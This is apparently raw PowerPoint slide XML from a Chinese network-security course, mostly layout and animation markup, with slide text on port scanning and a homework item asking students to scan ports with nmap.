              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649605" y="1952625"/>
            <a:ext cx="10892790" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用nmap工具进行端口扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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20" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bldLst>
  </p:timing>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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="dist">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="007BD3"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="034373"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin scaled="0"/>
                </a:gradFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>网络安全技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" cap="all" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="007BD3"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="034373"/>
                  </a:gs>
                </a:gsLst>
                <a:lin scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
